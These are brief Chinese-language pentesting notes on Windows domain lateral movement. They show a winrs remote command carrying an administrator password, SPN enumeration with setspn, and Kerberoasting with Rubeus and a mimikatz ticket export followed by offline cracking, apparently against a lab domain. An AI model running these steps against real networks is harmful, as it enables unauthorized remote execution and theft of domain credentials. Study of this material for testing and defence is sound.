1.WinRM&WinRS

條件：

雙方開啟winrm winrs服務

2008版本以上默認開啟，win 7默認關閉

檢測使用cs內置端口掃描5985開放情況

進行連接

winrs -r:http://192.168.93.30:5985 -u:administrator -p:Whoami2021 whoami

2.內網-spn

shell setspn -T god.org -q */*

探測主機

rc4可以被逆向aes256不可

3.kerbercast攻擊條件：

使用rc4進行加密類型票據，工具Rubeus檢測或者看加密類型

1.掃描：

shell setspn -T god.org -q */*

2.使用工具檢測

Rubeus kerbercast

3.使用手工進行判斷請求

使用klist查看

使用mimkaz進行導出和查看

導出

kerberos::list /export

使用腳本進行破解